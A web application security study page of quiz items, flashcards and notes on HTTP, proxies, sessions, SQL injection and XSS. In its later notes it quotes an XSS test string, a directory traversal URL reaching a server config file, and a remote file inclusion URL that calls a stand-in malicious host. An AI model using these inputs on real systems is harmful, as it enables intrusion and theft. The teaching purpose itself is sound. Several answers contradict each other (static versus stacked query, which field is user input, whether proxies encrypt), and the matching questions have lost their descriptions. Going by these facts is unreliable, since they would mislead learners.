Web Proxy Device Functions & HTTP

Questions and Answers

Which two functions are typically provided by a web proxy device?

  • Translating HTTP messages to FTP and SMTP messages
  • Enabling HTTP transfers across a firewall (correct)
  • Caching of HTTP messages (correct)
  • Encrypting HTTP packets transmitted between web clients and web servers
  • Scanning a web server for related contents

Match the HTTP status code range to its general description:

  • Codes in the 500 range (correct)
  • Codes in the 100 range (correct)
  • Codes in the 400 range (correct)
  • Codes in the 300 range (correct)
  • Codes in the 200 range (correct)

Match the parts of the following URL to the description: ftp://xyz-company.com:2457/support/file;id=65?name=intro&r=true

  • id=65 (correct)
  • xyz-company.com (correct)
  • ftp (correct)
  • name=intro&r=true (correct)
  • support/file (correct)
  • 2457 (correct)

Which function is primarily provided by HTTP/2.0 to improve performance compared to HTTP/1.1?

HTTP/2.0 provides HTTP message multiplexing and requires fewer messages to download web content. (C)

Why is it recommended that application developers change the default session ID names used by common web application development frameworks?

These session ID names can be used to fingerprint the application framework employed. (D)

A user is using an online shopping website to order laptop computers. Which mechanism is likely used by the shopping site in order to securely maintain user authentication during shopping?

Session ID (B)

What is the best mitigation approach against session fixation attacks?

Ensure that the session ID is used after a user completes authentication. (E)

Which two attributes can be set in a web application cookie to indicate that it is a persistent cookie?

Expires (A), Max-Age (D)

Which international organization is dedicated to educating industry professionals, creating tools, and evangelizing practices for securing web applications?

Open Web Application Security Project (OWASP) (B)

In the SQL statement SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%';, which component is most likely to be user input in a web form?

ping (E)

Which statement best describes an example of an out-of-band SQL injection attack?

An attacker launches the attack on a web site and forces the web application to send the query results via an email. (B)

A threat actor launches an SQL injection attack against a website by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. What type of SQL injection attack is the threat actor using?

In-band (C)

An attacker launches an SQL injection attack on a web application by trying to force the application to request the back-end database to perform multiple SELECT queries. Which technique exploits the SQL injection vulnerability on the web application?

Union operator (C)

Which type of SQL query is in the following SQL statement? select * from users where user = "admin";

Static query (A)

A company uses Microsoft Active Directory to manage the authentication and authorization of employee workstations. The company hires a cybersecurity professional to perform compliance penetration testing. Which type of penetration testing can be used to verify the Active Directory configuration?

LDAP injection (B)

Flashcards

Web Proxy Functions

A web proxy provides caching of HTTP messages, improving response times and reducing bandwidth usage. It also allows HTTP transfers across a firewall, facilitating communication between networks with different security policies.

200 Status Codes

HTTP status codes in the 200 range indicate successful transactions.

300 Status Codes

HTTP status codes in the 300 range relate to HTTP redirections.

400 Status Codes

HTTP status codes in the 400 range are related to client errors.

500 Status Codes

HTTP status codes in the 500 range relate to server errors.

100 Status Codes

HTTP status codes in the 100 range are informational.

Host (URL)

xyz-company.com is the host in the URL.

Port (URL)

2457 is the port in the URL.

Path (URL)

support/file is the path in the URL.

Scheme (URL)

ftp is the scheme in the URL.

Query String (URL)

name=intro&r=true is the query string in the URL.

Path-segment Parameter (URL)

id=65 is the path-segment parameter in the URL.

HTTP/2.0 Improvement

HTTP/2.0 improves performance over HTTP/1.1 by providing HTTP message multiplexing, which means it can send multiple requests and responses simultaneously over a single TCP connection, reducing latency and improving resource utilization.

Session ID Naming

Application developers should change session ID names to prevent attackers from fingerprinting the application framework. Common session ID names are well-known and can be exploited.

Session ID Purpose

Session IDs are the mechanism shopping sites use to securely maintain user authentication during shopping.

Study Notes

Web Proxy Device Functions

  • Caching of HTTP messages reduces bandwidth usage and improves response times.
  • Encrypting HTTP packets transmitted between web clients and web servers protects sensitive data.

HTTP Status Codes

  • 200 range: related to successful transactions
  • 300 range: related to HTTP redirections
  • 400 range: related to client errors
  • 500 range: related to server errors
  • 100 range: informational

URL Elements

  • xyz-company.com: host
  • 2457: port
  • support/file: path
  • ftp: scheme
  • name=intro&r=true: query-string
  • id=65: path-segment-params

Improvement of HTTP 2.0 vs HTTP 1.1

  • HTTP 2.0 provides HTTP message multiplexing and requires fewer messages to download web content.
  • HTTP 2.0 compresses HTTP messages.

Session ID names

  • Application developers should change the session ID names used by common web application development frameworks, because the default session ID names can be used to fingerprint the application framework employed.

Securely Maintain User Authentication

  • A session ID is used by the shopping site to securely maintain user authentication during shopping.

Mitigation Approach Against Session Fixation Attacks

  • Ensure that the session ID is used after a user completes authentication.
  • Ensure that the session ID is exchanged only through an encrypted channel.

Persistent Cookies

  • Expires
  • Max-Age

Organization dedicated to securing web applications

  • Open Web Application Security Project (OWASP) is dedicated to educating industry professionals, creating tools, and evangelizing best practices for securing web applications and underlying systems.

Web form User Input

  • attack is most likely user input on a web form: SELECT * FROM group WHERE attack = 'network' AND a-type LIKE 'ping%';

Out-of-band SQL injection

  • An attacker launches the attack on a web site and forces the web application to send the query results via an email.

SQL injection

  • A threat actor launches an SQL injection attack against a web site by sending multiple specific statements to the web site and reconstructing the key information the threat actor seeks. The threat actor is using an in-band SQL injection attack.

Exploit the SQL injection

  • An attacker launches an SQL injection attack on a web application by trying to force the application to request the back-end database to perform multiple SELECT queries. The technique that exploits the SQL injection vulnerability on the web application is the Union operator.

SQL Query Type

  • The SQL query type in the SQL statement select * from users where user = "admin"; is stacked query.

Compliance Penetration Testing

  • LDAP injection can be used to verify the proper configuration of the Active Directory service.

Dangerous web session

  • Including the session ID in the URL is a potentially dangerous web session management practice.

HTTPOnly flag

  • It indicates to the web browser that web client-based code cannot access the cookie.

Mitigate configuration of routers and switches

  • Default credential attack is mitigated by configuring newly purchased routers and switches with advanced security measures before deploying them to the production network.

Exploit Vulnerability

  • HTTP parameter pollution is the type of vulnerability the attacker tries to exploit: https://portal.a-univ.edu/?search=students&results=50&search=staff

Test String

  • To test for cross-site scripting vulnerabilities, the tester will use the string <script>alert("XSS Test Now")</script> in a user input field in a web form.

Prevent XSS attacks

  • Use HTTPS only mode for accessing web applications.
  • Use HTML escape before inserting untrusted data into HTML element content.
  • Use attribute escape before inserting untrusted data into HTML common attributes.
  • Use JavaScript escape before inserting untrusted data into JavaScript data values.

Web Vulnerability

  • Directory traversal is being exploited by the attacker: http://192.168.46.82:45/vulnerabilities/fi/?page=../../../../../etc/httpd/httpd.conf

Vulnerability

  • Remote file inclusion is the type of vulnerability the attacker tried to exploit: http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html

Insecure Code Compromise

  • The use of hard-coded credentials enabled this catastrophic threat.

Mitigate Vulnerabilities

  • Use a well-thought-out scheme to provide meaningful error messages to the users but no useful information to an attacker.